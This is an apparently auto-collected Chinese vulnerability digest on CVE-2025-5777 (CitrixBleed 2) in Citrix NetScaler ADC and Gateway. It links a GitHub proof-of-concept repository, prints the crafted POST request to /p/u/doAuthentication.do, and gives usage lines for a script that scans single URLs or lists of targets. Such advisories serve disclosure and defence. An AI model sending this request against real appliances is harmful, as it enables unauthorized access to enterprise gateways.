Citrix NetScaler ADC/Citrix Gateway CVE-2025-5777 Vulnerability

漏洞信息

漏洞名称: Citrix NetScaler ADC/Citrix Gateway CVE-2025-5777 Vulnerability

漏洞编号:

  • CVE: CVE-2025-5777

漏洞类型: 未授权访问

漏洞等级: 高危

漏洞描述: CVE-2025-5777,也被称为CitrixBleed 2,是针对Citrix NetScaler ADC和Citrix Gateway的未授权访问漏洞。Citrix NetScaler ADC和Gateway是广泛使用的企业级网络设备和安全解决方案,用于提供应用交付、负载均衡和安全的远程访问服务。这些产品在全球范围内被大量企业和服务提供商所部署,用于保障关键业务应用的高可用性和安全性。该漏洞的根源在于认证过程中的缺陷,允许攻击者通过构造特定的HTTP请求绕过认证机制,无需有效凭证即可访问受保护的资源。具体来说,攻击者可以通过发送特制的POST请求到/p/u/doAuthentication.do端点,触发漏洞实现未授权访问。这种漏洞的存在可能导致严重的安全风险,包括但不限于敏感数据泄露、服务中断以及进一步的网络渗透。由于漏洞利用无需认证且可以自动化执行,攻击门槛较低,因此被评级为高危漏洞。企业用户应立即检查并更新受影响的产品版本,以防范潜在的攻击。

产品厂商: Citrix

产品名称: Citrix NetScaler ADC, Citrix Gateway

来源: https://github.com/SleepNotF0und/CVE-2025-5777

类型: CVE-2025:github search

仓库文件

  • CVE‑2025‑5777.py
  • README.md

来源概述

wwww .

PoC 

1
2
3
4
5
POST /p/u/doAuthentication.do HTTP/1.1
Host: 167.xxx.xx.x
Content-Length: 5

login

.
Usage:-
python CVE‑2025‑5777.py <<-URL->>

python CVE‑2025‑5777.py -l test.txt

Github Poc
#CVE-2025:github search #未授权访问
Citrix NetScaler ADC/Citrix Gateway CVE-2025-5777 Vulnerability
http://example.com/2025/07/15/github_1727314151/
作者
lianccc
发布于
2025年7月15日
许可协议